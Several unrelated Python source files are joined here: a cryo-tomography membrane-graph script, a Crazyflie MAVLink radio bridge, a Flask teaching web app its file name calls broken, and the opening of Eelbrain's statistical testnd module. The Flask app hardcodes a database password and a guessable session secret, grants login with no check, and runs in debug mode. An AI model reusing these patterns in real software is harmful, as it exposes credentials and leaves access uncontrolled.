print('\tP[' + str(pr_id) + '] Computing paths for ' + input_tomo + ' ...')
path, stem_tomo = os.path.split(input_tomo)
stem_pkl, _ = os.path.splitext(stem_tomo)
input_file = output_dir + '/' + stem_pkl + '_g' + str(s_sig) + '.fits'
_, stem = os.path.split(input_file)
stem, _ = os.path.splitext(stem)
print('\tP[' + str(pr_id) + '] Loading input data: ' + stem_tomo)
tomo = ps.disperse_io.load_tomo(input_tomo).astype(np.float32)
seg = ps.disperse_io.load_tomo(input_seg)
print('\tP[' + str(pr_id) + '] Computing masks and segmentation tomograms...')
tomoh = np.zeros(shape=seg.shape, dtype=np.bool)
mb_dst_off_v = int(math.ceil(mb_dst_off * res))
tomoh[mb_dst_off_v:-mb_dst_off_v, mb_dst_off_v:-mb_dst_off_v, mb_dst_off_v:-mb_dst_off_v] = True
mask = ((tomoh & (seg != BG_LBL)) == False).astype(np.float)
input_msk = output_dir + '/' + stem_pkl + '_mask.fits'
ps.disperse_io.save_numpy(mask.transpose(), input_msk)
mask = mask == False
mask_den = ((seg == MB_LBL_1) | (seg == MB_LBL_2)) & mask
print('\tP[' + str(pr_id) + '] Smoothing input tomogram (s=' + str(s_sig) + ')...')
density = sp.ndimage.filters.gaussian_filter(tomo, s_sig)
density = ps.globals.cont_en_std(density, nstd=nstd, lb=0, ub=1, mask=mask)
ps.disperse_io.save_numpy(tomo, output_dir + '/' + stem_pkl + '.vti')
ps.disperse_io.save_numpy(density.transpose(), input_file)
ps.disperse_io.save_numpy(density, output_dir + '/' + stem + '.vti')
print('\tP[' + str(pr_id) + '] Initializing DisPerSe...')
work_dir = output_dir + '/disperse_pr_' + str(pr_id)
disperse = ps.disperse_io.DisPerSe(input_file, work_dir)
try:
disperse.clean_work_dir()
# except ps.pexceptions.PySegInputWarning as e:
# print e.get_message()
except Warning:
print('Jol!!!')
# Manifolds for descending fields with the inverted image
disperse.set_manifolds('J0a')
# Down skeleton
disperse.set_dump_arcs(-1)
# disperse.set_nsig_cut(nsig)
rcut = round(density[mask_den].std() * csig, 4)
print('\tP[' + str(pr_id) + '] Persistence cut thereshold set to: ' + str(rcut) + ' grey level')
disperse.set_cut(rcut)
disperse.set_mask(input_msk)
disperse.set_smooth(smooth)
print('\tP[' + str(pr_id) + '] Running DisPerSe...')
disperse.mse(no_cut=False, inv=False)
skel = disperse.get_skel()
manifolds = disperse.get_manifolds(no_cut=False, inv=False)
# Build the GraphMCF for the membrane
print('\tP[' + str(pr_id) + '] Building MCF graph for a pair of oriented membranes...')
# graph = ps.mb.MbGraphMCF(skel, manifolds, density, seg)
graph = ps.mb.SynGraphMCF(skel, manifolds, density, seg)
graph.set_resolution(res)
graph.build_from_skel(basic_props=False)
graph.filter_self_edges()
graph.filter_repeated_edges()
print('\tP[' + str(pr_id) + '] Filtering nodes close to mask border...')
mask = sp.ndimage.morphology.binary_dilation(mask, iterations=DILATE_NITER)
for v in graph.get_vertices_list():
x, y, z = graph.get_vertex_coords(v)
if not mask[int(round(x)), int(round(y)), int(round(z))]:
graph.remove_vertex(v)
print('\tP[' + str(pr_id) + '] Building geometry...')
graph.build_vertex_geometry()
if do_clahe:
print('\tP[' + str(pr_id) + '] CLAHE on filed_value_inv property...')
graph.compute_edges_length(ps.globals.SGT_EDGE_LENGTH, 1, 1, 1, False)
graph.clahe_field_value(max_geo_dist=50, N=256, clip_f=100., s_max=4.)
print('\tP[' + str(pr_id) + '] Computing vertices and edges properties...')
graph.compute_vertices_dst()
graph.compute_edge_filamentness()
graph.add_prop_inv(prop_topo, edg=True)
graph.compute_edge_affinity()
print('\tP[' + str(pr_id) + '] Applying general thresholds...')
if ang_rot is not None:
print('\tDeleting edges in MW area...')
graph.filter_mw_edges(ang_rot, ang_tilt)
print('\tP[' + str(pr_id) + '] Computing graph global statistics (before simplification)...')
nvv, nev, nepv = graph.compute_global_stat(mask=mask_den)
print('\t\t-P[' + str(pr_id) + '] Vertex density: ' + str(round(nvv, 5)) + ' nm^3')
print('\t\t-P[' + str(pr_id) + '] Edge density: ' + str(round(nev, 5)) + ' nm^3')
print('\t\t-P[' + str(pr_id) + '] Edge/Vertex ratio: ' + str(round(nepv, 5)))
print('\tP[' + str(pr_id) + '] Graph density simplification for vertices...')
if prop_topo != ps.globals.STR_FIELD_VALUE:
print('\t\tProperty used: ' + prop_topo)
graph.set_pair_prop(prop_topo)
try:
graph.graph_density_simp_ref(mask=np.asarray(mask_den, dtype=np.int), v_den=v_den,
v_prop=v_prop, v_mode=v_mode)
except ps.pexceptions.PySegInputWarning as e:
print('P[' + str(pr_id) + '] WARNING: graph density simplification failed:')
print('\t-' + e.get_message())
print('\tGraph density simplification for edges in membrane 1...')
mask_pst = (seg == MB_LBL_1) & mask
nvv, nev, nepv = graph.compute_global_stat(mask=mask_pst)
if nepv > ve_ratio:
e_den = nvv * ve_ratio
hold_e_prop = e_prop
graph.graph_density_simp_ref(mask=np.asarray(mask_pst, dtype=np.int), e_den=e_den,
e_prop=hold_e_prop, e_mode=e_mode, fit=True)
else:
print('\tWARNING: demanded ratio ' + str(nepv) + ' could not be achieved (current is ' + str(nepv))
print('\tGraph density simplification for edges in the membrane 2...')
mask_pre = (seg == MB_LBL_2) & mask
nvv, nev, nepv = graph.compute_global_stat(mask=mask_pre)
if nepv > ve_ratio:
e_den = nvv * ve_ratio
hold_e_prop = e_prop
graph.graph_density_simp_ref(mask=np.asarray(mask_pre, dtype=np.int), e_den=e_den,
e_prop=hold_e_prop, e_mode=e_mode, fit=True)
else:
print('\tWARNING: demanded ratio ' + str(nepv) + ' could not be achieved (current is ' + str(nepv))
print('\tGraph density simplification for edges in the exterior 1...')
mask_psd = (seg == EXT_LBL_1) & mask
nvv, nev, nepv = graph.compute_global_stat(mask=mask_psd)
if nepv > ve_ratio:
e_den = nvv * ve_ratio
hold_e_prop = e_prop
graph.graph_density_simp_ref(mask=np.asarray(mask_psd, dtype=np.int), e_den=e_den,
e_prop=hold_e_prop, e_mode=e_mode, fit=True)
else:
print('\tWARNING: demanded ratio ' + str(nepv) + ' could not be achieved (current is ' + str(nepv))
print('\tGraph density simplification for edges in the exterior 2...')
mask_az = (seg == EXT_LBL_2) & mask
nvv, nev, nepv = graph.compute_global_stat(mask=mask_az)
if nepv > ve_ratio:
e_den = nvv * ve_ratio
hold_e_prop = e_prop
graph.graph_density_simp_ref(mask=np.asarray(mask_az, dtype=np.int), e_den=e_den,
e_prop=hold_e_prop, e_mode=e_mode, fit=True)
else:
print('\tWARNING: demanded ratio ' + str(nepv) + ' could not be achieved (current is ' + str(nepv))
print('\tGraph density simplification for edges in the gap...')
mask_clf = (seg == GAP_LBL) & mask
nvv, nev, nepv = graph.compute_global_stat(mask=mask_clf)
if nepv > ve_ratio:
e_den = nvv * ve_ratio
hold_e_prop = e_prop
graph.graph_density_simp_ref(mask=np.asarray(mask_clf, dtype=np.int), e_den=e_den,
e_prop=hold_e_prop, e_mode=e_mode, fit=True)
else:
print('\tWARNING: demanded ratio ' + str(nepv) + ' could not be achieved (current is ' + str(nepv))
print('\tComputing graph global statistics (after simplification)...')
nvv, _, _ = graph.compute_global_stat(mask=mask_den)
_, nev_pst, nepv_pst = graph.compute_global_stat(mask=mask_pst)
_, nev_pre, nepv_pre = graph.compute_global_stat(mask=mask_pre)
_, nev_psd, nepv_psd = graph.compute_global_stat(mask=mask_psd)
_, nev_az, nepv_az = graph.compute_global_stat(mask=mask_az)
_, nev_clf, nepv_clf = graph.compute_global_stat(mask=mask_clf)
print('\t\t-Vertex density (membranes): ' + str(round(nvv, 5)) + ' nm^3')
print('\t\t-Edge density (MB1):' + str(round(nev_pst, 5)) + ' nm^3')
print('\t\t-Edge density (MB2):' + str(round(nev_pre, 5)) + ' nm^3')
print('\t\t-Edge density (EXT1):' + str(round(nev_psd, 5)) + ' nm^3')
print('\t\t-Edge density (EXT2):' + str(round(nev_az, 5)) + ' nm^3')
print('\t\t-Edge density (GAP):' + str(round(nev_clf, 5)) + ' nm^3')
print('\t\t-Edge/Vertex ratio (MB1): ' + str(round(nepv_pst, 5)))
print('\t\t-Edge/Vertex ratio (MB2): ' + str(round(nepv_pre, 5)))
print('\t\t-Edge/Vertex ratio (EXT1): ' + str(round(nepv_psd, 5)))
print('\t\t-Edge/Vertex ratio (EXT2): ' + str(round(nepv_az, 5)))
print('\t\t-Edge/Vertex ratio (GAP): ' + str(round(nepv_az, 5)))
print('\tComputing graph properties (2)...')
graph.compute_mb_geo()
graph.compute_mb_eu_dst()
graph.compute_edge_curvatures()
# graph.compute_edges_length(ps.globals.SGT_EDGE_LENGTH, 1, 1, 1, False)
graph.compute_vertices_dst()
graph.compute_edge_filamentness()
graph.compute_edge_affinity()
print('\tSaving intermediate graphs...')
ps.disperse_io.save_vtp(graph.get_vtp(av_mode=True, edges=True),
output_dir + '/' + stem + '_edges.vtp')
ps.disperse_io.save_vtp(graph.get_vtp(av_mode=False, edges=True),
output_dir + '/' + stem + '_edges_2.vtp')
# ps.disperse_io.save_vtp(graph.get_scheme_vtp(nodes=True, edges=True),
# output_dir + '/' + stem + '_sch.vtp')
out_pkl = output_dir + '/' + stem_pkl + '.pkl'
print('\tP[' + str(pr_id) + '] Pickling the graph as: ' + out_pkl)
graph.pickle(out_pkl)
# star.set_element('_psGhMCFPickle', row, out_pkl)
q_pkls.put((row, out_pkl))
pkls_dic[row] = out_pkl
sys.exit(pr_id)
# Loop for processing the input data
print('Running main loop in parallel: ')
q_pkls = mp.Queue()
processes, pr_results = dict(), dict()
spl_ids = np.array_split(list(range(star.get_nrows())), npr)
for pr_id in range(npr):
pr = mp.Process(target=pr_worker, args=(pr_id, spl_ids[pr_id], q_pkls))
pr.start()
processes[pr_id] = pr
for pr_id, pr in zip(iter(processes.keys()), iter(processes.values())):
pr.join()
if pr_id != pr.exitcode:
print('ERROR: the process ' + str(pr_id) + ' ended unsuccessfully [' + str(pr.exitcode) + ']')
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
count, n_rows = 0, star.get_nrows()
while count < n_rows:
hold_out_pkl = q_pkls.get()
star.set_element(key='_psGhMCFPickle', row=hold_out_pkl[0], val=hold_out_pkl[1])
count += 1
out_star = output_dir + '/' + os.path.splitext(os.path.split(in_star)[1])[0] + '_mb_graph.star'
print('\tStoring output STAR file in: ' + out_star)
star.store(out_star)
print('Terminated. (' + time.strftime("%c") + ')')
|
cfbridge.py
|
#!/usr/bin/env python
"""
Bridge a Crazyflie connected to a Crazyradio to a local MAVLink port
Requires 'pip install cflib'
As the ESB protocol works using PTX and PRX (Primary Transmitter/Reciever)
modes. Thus, data is only recieved as a response to a sent packet.
So, we need to constantly poll the receivers for bidirectional communication.
@author: Dennis Shtatnov (densht@gmail.com)
Based off example code from crazyflie-lib-python/examples/read-eeprom.py
"""
# import struct
import logging
import socket
import sys
import threading
import time
import cflib.crtp
from cflib.crazyflie import Crazyflie
from cflib.crtp.crtpstack import CRTPPacket
# from cflib.crtp.crtpstack import CRTPPort
CRTP_PORT_MAVLINK = 8
# Only output errors from the logging framework
logging.basicConfig(level=logging.DEBUG)
class RadioBridge:
def __init__(self, link_uri):
""" Initialize and run the example with the specified link_uri """
# UDP socket for interfacing with GCS
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._sock.bind(('127.0.0.1', 14551))
# Create a Crazyflie object without specifying any cache dirs
self._cf = Crazyflie()
# Connect some callbacks from the Crazyflie API
self._cf.connected.add_callback(self._connected)
self._cf.disconnected.add_callback(self._disconnected)
self._cf.connection_failed.add_callback(self._connection_failed)
self._cf.connection_lost.add_callback(self._connection_lost)
print('Connecting to %s' % link_uri)
# Try to connect to the Crazyflie
self._cf.open_link(link_uri)
# Variable used to keep main loop occupied until disconnect
self.is_connected = True
threading.Thread(target=self._server).start()
def _connected(self, link_uri):
""" This callback is called form the Crazyflie API when a Crazyflie
has been connected and the TOCs have been downloaded."""
print('Connected to %s' % link_uri)
self._cf.packet_received.add_callback(self._got_packet)
def _got_packet(self, pk):
if pk.port == CRTP_PORT_MAVLINK:
self._sock.sendto(pk.data, ('127.0.0.1', 14550))
def _forward(self, data):
pk = CRTPPacket()
pk.port = CRTP_PORT_MAVLINK # CRTPPort.COMMANDER
pk.data = data # struct.pack('<fffH', roll, -pitch, yaw, thrust)
self._cf.send_packet(pk)
def _server(self):
while True:
print('\nwaiting to receive message')
# Only receive what can be sent in one message
data, address = self._sock.recvfrom(256)
print('received %s bytes from %s' % (len(data), address))
for i in range(0, len(data), 30):
self._forward(data[i:(i+30)])
def _stab_log_error(self, logconf, msg):
"""Callback from the log API when an error occurs"""
print('Error when logging %s: %s' % (logconf.name, msg))
def _stab_log_data(self, timestamp, data, logconf):
"""Callback froma the log API when data arrives"""
print('[%d][%s]: %s' % (timestamp, logconf.name, data))
def _connection_failed(self, link_uri, msg):
"""Callback when connection initial connection fails (i.e no Crazyflie
at the speficied address)"""
print('Connection to %s failed: %s' % (link_uri, msg))
self.is_connected = False
def _connection_lost(self, link_uri, msg):
"""Callback when disconnected after a connection has been made (i.e
Crazyflie moves out of range)"""
print('Connection to %s lost: %s' % (link_uri, msg))
def _disconnected(self, link_uri):
"""Callback when the Crazyflie is disconnected (called in all cases)"""
print('Disconnected from %s' % link_uri)
self.is_connected = False
if __name__ == '__main__':
# Initialize the low-level drivers (don't list the debug drivers)
cflib.crtp.radiodriver.set_retries_before_disconnect(1500)
cflib.crtp.radiodriver.set_retries(3)
cflib.crtp.init_drivers(enable_debug_driver=False)
# Scan for Crazyflies and use the first one found
print('Scanning interfaces for Crazyflies...')
if len(sys.argv) > 2:
address = int(sys.argv[2], 16) # address=0xE7E7E7E7E7
else:
address = None
available = cflib.crtp.scan_interfaces(address)
print('Crazyflies found:')
for i in available:
print(i[0])
if len(available) > 0:
if len(sys.argv) > 1:
channel = str(sys.argv[1])
else:
channel = 80
link_uri = 'radio://0/' + str(channel) + '/2M'
le = RadioBridge(link_uri) # (available[0][0])
# The Crazyflie lib doesn't contain anything to keep the application alive,
# so this is where your application should do something. In our case we
# are just waiting until we are disconnected.
try:
while le.is_connected:
time.sleep(1)
except KeyboardInterrupt:
sys.exit(1)
|
vsearch4web.not.slow.with.threads.but.broken.py
|
from flask import Flask, render_template, request, escape, session
from vsearch import search4letters
from DBcm import UseDatabase, ConnectionError, CredentialsError, SQLError
from checker import check_logged_in
from threading import Thread
from time import sleep
app = Flask(__name__)
app.config['dbconfig'] = {'host': '127.0.0.1',
'user': 'vsearch',
'password': 'vsearchpasswd',
'database': 'vsearchlogDB', }
@app.route('/login')
def do_login() -> str:
session['logged_in'] = True
return 'You are now logged in.'
@app.route('/logout')
def do_logout() -> str:
session.pop('logged_in')
return 'You are now logged out.'
def log_request(req: 'flask_request', res: str) -> None:
"""Log details of the web request and the results."""
# raise Exception("Something awful just happened.")
sleep(15) # This makes log_request really slow...
with UseDatabase(app.config['dbconfig']) as cursor:
_SQL = """insert into log
(phrase, letters, ip, browser_string, results)
values
(%s, %s, %s, %s, %s)"""
cursor.execute(_SQL, (req.form['phrase'],
req.form['letters'],
req.remote_addr,
req.user_agent.browser,
res, ))
@app.route('/search4', methods=['POST'])
def do_search() -> 'html':
"""Extract the posted data; perform the search; return results."""
phrase = request.form['phrase']
letters = request.form['letters']
title = 'Here are your results:'
results = str(search4letters(phrase, letters))
try:
t = Thread(target=log_request, args=(request, results))
t.start()
except Exception as err:
print('***** Logging failed with this error:', str(err))
return render_template('results.html',
the_title=title,
the_phrase=phrase,
the_letters=letters,
the_results=results,)
@app.route('/')
@app.route('/entry')
def entry_page() -> 'html':
"""Display this webapp's HTML form."""
return render_template('entry.html',
the_title='Welcome to search4letters on the web!')
@app.route('/viewlog')
@check_logged_in
def view_the_log() -> 'html':
"""Display the contents of the log file as a HTML table."""
try:
with UseDatabase(app.config['dbconfig']) as cursor:
_SQL = """select phrase, letters, ip, browser_string, results
from log"""
cursor.execute(_SQL)
contents = cursor.fetchall()
# raise Exception("Some unknown exception.")
titles = ('Phrase', 'Letters', 'Remote_addr', 'User_agent', 'Results')
return render_template('viewlog.html',
the_title='View Log',
the_row_titles=titles,
the_data=contents,)
except ConnectionError as err:
print('Is your database switched on? Error:', str(err))
except CredentialsError as err:
print('User-id/Password issues. Error:', str(err))
except SQLError as err:
print('Is your query correct? Error:', str(err))
except Exception as err:
print('Something went wrong:', str(err))
return 'Error'
app.secret_key = 'YouWillNeverGuessMySecretKey'
if __name__ == '__main__':
app.run(debug=True)
|
testnd.py
|
'''Statistical tests for NDVars
Common Attributes
-----------------
The following attributes are always present. For ANOVA, they are lists with the
corresponding items for different effects.
t/f/... : NDVar
Map of the statistical parameter.
p_uncorrected : NDVar
Map of uncorrected p values.
p : NDVar | None
Map of corrected p values (None if no correct was applied).
clusters : Dataset | None
Table of all the clusters found (None if no clusters were found, or if no
clustering was performed).
n_samples : None | int
The actual number of permutations. If ``samples = -1``, i.e. a complete set
or permutations is performed, then ``n_samples`` indicates the actual
number of permutations that constitute the complete set.
'''
from datetime import datetime, timedelta
from functools import reduce, partial
from itertools import chain, repeat
from math import ceil
from multiprocessing import Process, Event, SimpleQueue
from multiprocessing.sharedctypes import RawArray
import logging
import operator
import os
import re
import socket
from time import time as current_time
from typing import Union
import numpy as np
import scipy.stats
from scipy import ndimage
from tqdm import trange
from .. import fmtxt, _info, _text
from ..fmtxt import FMText
from .._celltable import Celltable
from .._config import CONFIG
from .._data_obj import (
CategorialArg, CellArg, IndexArg, ModelArg, NDVarArg, VarArg,
Dataset, Var, Factor, Interaction, NestedEffect,
NDVar, Categorial, UTS,
ascategorial, asmodel, asndvar, asvar, assub,
cellname, combine, dataobj_repr)
from .._exceptions import OldVersionError, WrongDimension, ZeroVariance
from .._utils import LazyProperty, user_activity, restore_main_spec
from .._utils.numpy_utils import FULL_AXIS_SLICE
from . import opt, stats, vector
from .connectivity import Connectivity, find_peaks
from .connectivity_opt import merge_labels, tfce_increment
from .glm import _nd_anova
from .permutation import (
_resample_params, permute_order, permute_sign_flip, random_seeds,
rand_rotation_matrices)
from .t_contrast import TContrastRel
from .test import star, star_factor, _independent_measures_args, _related_measures_args
__test__ = False
def check_for_vector_dim(y: NDVar) -> None:
for dim in y.dims:
if dim._connectivity_type == 'vector':
raise WrongDimension(f"{dim}: mass-univariate methods are not suitable for vectors. Consider using vector norm as test statistic, or using a testnd.Vector test function.")
def check_variance(x):
if x.ndim != 2:
x = x.reshape((len(x), -1))
if opt.has_zero_variance(x):
raise ZeroVariance("y contains data column with zero variance")
class NDTest:
"""Baseclass for testnd test results
Attributes
----------
p : NDVar | None
Map of p-values corrected for multiple comparison (or None if no
correction was performed).
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
"""
_state_common = ('y', 'match', 'sub', 'samples', 'tfce', 'pmin', '_cdist',
'tstart', 'tstop', '_dims')
_state_specific = ()
_statistic = None
_statistic_tail = 0
@property
def _attributes(self):
return self._state_common + self._state_specific
def __init__(self, y, match, sub, samples, tfce, pmin, cdist, tstart, tstop):
self.y = dataobj_repr(y)
self.match = dataobj_repr(match) if match else match
self.sub = sub
self.samples = samples
self.tfce = tfce
self.pmin = pmin
self._cdist = cdist
self.tstart = tstart
self.tstop = tstop
self._dims = y.dims[1:]
def __getstate__(self):
return {name: getattr(self, name, None) for name in self._attributes}
def __setstate__(self, state):
# backwards compatibility:
if 'Y' in state:
state['y'] = state.pop('Y')
if 'X' in state:
state['x'] = state.pop('X')
for k, v in state.items():
setattr(self, k, v)
# backwards compatibility:
if 'tstart' not in state:
cdist = self._first_cdist
self.tstart = cdist.tstart
self.tstop = cdist.tstop
if '_dims' not in state: # 0.17
if 't' in state:
self._dims = state['t'].dims
elif 'r' in state:
self._dims = state['r'].dims
elif 'f' in state:
self._dims = state['f'][0].dims
else:
raise RuntimeError("Error recovering old test results dims")
self._expand_state()
def __repr__(self):
args = self._repr_test_args()
if self.sub is not None:
if isinstance(self.sub, np.ndarray):
sub_repr = '<array>'
else:
sub_repr = repr(self.sub)
args.append(f'sub={sub_repr}')
if self._cdist:
args += self._repr_cdist()
else:
args.append('samples=0')
return f"<{self.__class__.__name__} {', '.join(args)}>"
def _repr_test_args(self):
"""List of strings describing parameters unique to the test
Will be joined with ``", ".join(repr_args)``
"""
raise NotImplementedError()
def _repr_cdist(self):
"""List of results (override for MultiEffectResult)"""
return (self._cdist._repr_test_args(self.pmin) +
self._cdist._repr_clusters())
def _expand_state(self):
"Override to create secondary results"
cdist = self._cdist
if cdist is None:
self.tfce_map = None
self.p = None
self._kind = None
else:
self.tfce_map = cdist.tfce_map
self.p = cdist.probability_map
self._kind = cdist.kind
def _desc_samples(self):
if self.samples == -1:
return f"a complete set of {self.n_samples} permutations"
elif self.samples is None:
return "no permutations"
else:
return f"{self.n_samples} random permutations"
def _desc_timewindow(self):
tstart = self._time_dim.tmin if self.tstart is None else self.tstart
tstop = self._time_dim.tstop if self.tstop is None else self.tstop
return f"{_text.ms(tstart)} - {_text.ms(tstop)} ms"
def _asfmtext(self):
p = self.p.min()
max_stat = self._max_statistic()
return FMText((fmtxt.eq(self._statistic, max_stat, 'max', stars=p), ', ', fmtxt.peq(p)))
def _default_plot_obj(self):
raise NotImplementedError
def _iter_cdists(self):
yield (None, self._cdist)
@property
def _first_cdist(self):
return self._cdist
def _plot_model(self):
"Determine x for plotting categories"
return None
def _plot_sub(self):
if isinstance(self.sub, str) and self.sub == "<unsaved array>":
raise RuntimeError("The sub parameter was not saved for previous "
"versions of Eelbrain. Please recompute this "
"result with the current version.")
return self.sub
def _assert_has_cdist(self):
if self._cdist is None:
raise RuntimeError("This method only applies to results of tests "
"with threshold-based clustering and tests with "
"a permutation distribution (samples > 0)")
def masked_parameter_map(self, pmin=0.05, **sub):
"""Create a copy of the parameter map masked by significance
Parameters
----------
pmin : scalar
Threshold p-value for masking (default 0.05). For threshold-based
cluster tests, ``pmin=1`` includes all clusters regardless of their
p-value.
Returns
-------
masked_map : NDVar
NDVar with data from the original parameter map wherever p <= pmin
and 0 everywhere else.
"""
self._assert_has_cdist()
return self._cdist.masked_parameter_map(pmin, **sub)
def cluster(self, cluster_id):
"""Retrieve a specific cluster as NDVar
Parameters
----------
cluster_id : int
Cluster id.
Returns
-------
cluster : NDVar
NDVar of the cluster, 0 outside the cluster.
Notes
-----
Clusters only have stable ids for thresholded cluster distributions.
"""
self._assert_has_cdist()
return self._cdist.cluster(cluster_id)
@LazyProperty
def clusters(self):
if self._cdist is None:
return None
else:
return self.find_clusters(None, True)
def find_clusters(self, pmin=None, maps=False, **sub):
"""Find significant regions or clusters
Parameters
----------
pmin : None | scalar, 1 >= p >= 0
Threshold p-value. For threshold-based tests, all clusters with a
p-value smaller than ``pmin`` are included (default 1);
for other tests, find contiguous regions with ``p ≤ pmin`` (default
0.05).
maps : bool
Include in the output a map of every cluster (can be memory
intensive if there are large statistical maps and/or many
clusters; default ``False``).
Returns
-------
ds : Dataset
Dataset with information about the clusters.
"""
self._assert_has_cdist()
return self._cdist.clusters(pmin, maps, **sub)
def find_peaks(self):
"""Find peaks in a threshold-free cluster distribution
Returns
-------
ds : Dataset
Dataset with information about the peaks.
"""
self._assert_has_cdist()
return self._cdist.find_peaks()
def compute_probability_map(self, **sub):
"""Compute a probability map
Returns
-------
probability : NDVar
Map of p-values.
"""
self._assert_has_cdist()
return self._cdist.compute_probability_map(**sub)
def info_list(self, computation=True):
"List with information about the test"
out = fmtxt.List("Mass-univariate statistics:")
out.add_item(self._name())
dimnames = [dim.name for dim in self._dims]
dimlist = out.add_sublist(f"Over {_text.enumeration(dimnames)}")
if 'time' in dimnames:
dimlist.add_item(f"Time interval: {self._desc_timewindow()}.")
cdist = self._first_cdist
if cdist is None:
out.add_item("No inferential statistics")
return out
# inference
l = out.add_sublist("Inference:")
if cdist.kind == 'raw':
l.add_item("Based on maximum statistic")
elif cdist.kind == 'tfce':
l.add_item("Based on maximum statistic with threshold-"
"free cluster enhancement (Smith & Nichols, 2009)")
elif cdist.kind == 'cluster':
l.add_item("Based on maximum cluster mass statistic")
sl = l.add_sublist("Cluster criteria:")
for dim in dimnames:
if dim == 'time':
sl.add_item(f"Minimum cluster duration {_text.ms(cdist.criteria.get('mintime', 0))} ms")
elif dim == 'source':
sl.add_item(f"At least {cdist.criteria.get('minsource', 0)} contiguous sources.")
elif dim == 'sensor':
sl.add_item(f"At least {cdist.criteria.get('minsensor', 0)} contiguous sensors.")
else:
value = cdist.criteria.get(f'min{dim}', 0)
sl.add_item(f"Minimum number of contiguous elements in {dim}: {value}")
# n samples
l.add_item(f"In {self._desc_samples()}")
# computation
if computation:
out.add_item(cdist.info_list())
return out
@property
def _statistic_map(self):
return getattr(self, self._statistic)
def _max_statistic(self):
tail = getattr(self, 'tail', self._statistic_tail)
return self._max_statistic_from_map(self._statistic_map, self.p, tail)
@staticmethod
def _max_statistic_from_map(stat_map: NDVar, p_map: NDVar, tail: int):
if tail == 0:
func = stat_map.extrema
elif tail == 1:
func = stat_map.max
else:
func = stat_map.min
if p_map:
mask = p_map <= .05 if p_map.min() <= .05 else None
else:
mask = None
return func() if mask is None else func(mask)
@property
def n_samples(self):
if self.samples == -1:
return self._first_cdist.samples
else:
return self.samples
@property
def _time_dim(self):
for dim in self._first_cdist.dims:
if isinstance(dim, UTS):
return dim
return None
class t_contrast_rel(NDTest):
"""Mass-univariate contrast based on t-values
Parameters
----------
y : NDVar
Dependent variable.
x : categorial
Model containing the cells which are compared with the contrast.
contrast : str
Contrast specification: see Notes.
match : Factor
Match cases for a repeated measures test.
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
tail : 0 | 1 | -1
Which tail of the t-distribution to consider:
0: both (two-tailed);
1: upper tail (one-tailed);
-1: lower tail (one-tailed).
samples : int
Number of samples for permutation test (default 10,000).
pmin : None | scalar (0 < pmin < 1)
Threshold for forming clusters: use a t-value equivalent to an
uncorrected p-value for a related samples t-test (with df =
len(match.cells) - 1).
tmin : scalar
Threshold for forming clusters as t-value.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
step of TFCE levels (for ``tfce is True``, 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
this dimension. For threshold-based test, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Notes
-----
A contrast specifies the steps to calculate a map based on *t*-values.
Contrast definitions can contain:
- Comparisons using ``>`` or ``<`` and data cells to compute *t*-maps.
For example, ``"cell1 > cell0"`` will compute a *t*-map of the comparison
if ``cell1`` and ``cell0``, being positive where ``cell1`` is greater than
``cell0`` and negative where ``cell0`` is greater than ``cell1``.
If the data is defined based on an interaction, cells are specified with
``|``, e.g. ``"a1 | b1 > a0 | b0"``. Cells can contain ``*`` to average
multiple cells. Thus, if the second factor in the model has cells ``b1``
and ``b0``, ``"a1 | * > a0 | *"`` would compare ``a1`` to ``a0``
while averaging ``b1`` and ``b0`` within ``a1`` and ``a0``.
- Unary numpy functions ``abs`` and ``negative``, e.g.
``"abs(cell1 > cell0)"``.
- Binary numpy functions ``subtract`` and ``add``, e.g.
``"add(a>b, a>c)"``.
- Numpy functions for multiple arrays ``min``, ``max`` and ``sum``,
e.g. ``min(a>d, b>d, c>d)``.
Cases with zero variance are set to t=0.
Examples
--------
To find cluster where both of two pairwise comparisons are reliable,
i.e. an intersection of two effects, one could use
``"min(a > c, b > c)"``.
To find a specific kind of interaction, where a is greater than b, and
this difference is greater than the difference between c and d, one
could use ``"(a > b) - abs(c > d)"``.
"""
_state_specific = ('x', 'contrast', 't', 'tail')
_statistic = 't'
@user_activity
def __init__(
self,
y: NDVarArg,
x: CategorialArg,
contrast: str,
match: CategorialArg = None,
sub: CategorialArg = None,
ds: Dataset = None,
tail: int = 0,
samples: int = 10000,
pmin: float = None,
tmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
**criteria):
if match is None:
raise TypeError("The `match` parameter needs to be specified for repeated measures test t_contrast_rel")
ct = Celltable(y, x, match, sub, ds=ds, coercion=asndvar, dtype=np.float64)
check_for_vector_dim(ct.y)
check_variance(ct.y.x)
# setup contrast
t_contrast = TContrastRel(contrast, ct.cells, ct.data_indexes)
# original data
tmap = t_contrast.map(ct.y.x)
n_threshold_params = sum((pmin is not None, tmin is not None, bool(tfce)))
if n_threshold_params == 0 and not samples:
threshold = cdist = None
elif n_threshold_params > 1:
raise ValueError("Only one of pmin, tmin and tfce can be specified")
else:
if pmin is not None:
df = len(ct.match.cells) - 1
threshold = stats.ttest_t(pmin, df, tail)
elif tmin is not None:
threshold = abs(tmin)
else:
threshold = None
cdist = NDPermutationDistribution(
ct.y, samples, threshold, tfce, tail, 't', "t-contrast",
tstart, tstop, criteria, parc, force_permutation)
cdist.add_original(tmap)
if cdist.do_permutation:
iterator = permute_order(len(ct.y), samples, unit=ct.match)
run_permutation(t_contrast, cdist, iterator)
# NDVar map of t-values
info = _info.for_stat_map('t', threshold, tail=tail, old=ct.y.info)
t = NDVar(tmap, ct.y.dims[1:], info, 't')
# store attributes
NDTest.__init__(self, ct.y, ct.match, sub, samples, tfce, pmin, cdist,
tstart, tstop)
self.x = ('%'.join(ct.x.base_names) if isinstance(ct.x, Interaction) else
ct.x.name)
self.contrast = contrast
self.tail = tail
self.tmin = tmin
self.t = t
self._expand_state()
def _name(self):
if self.y:
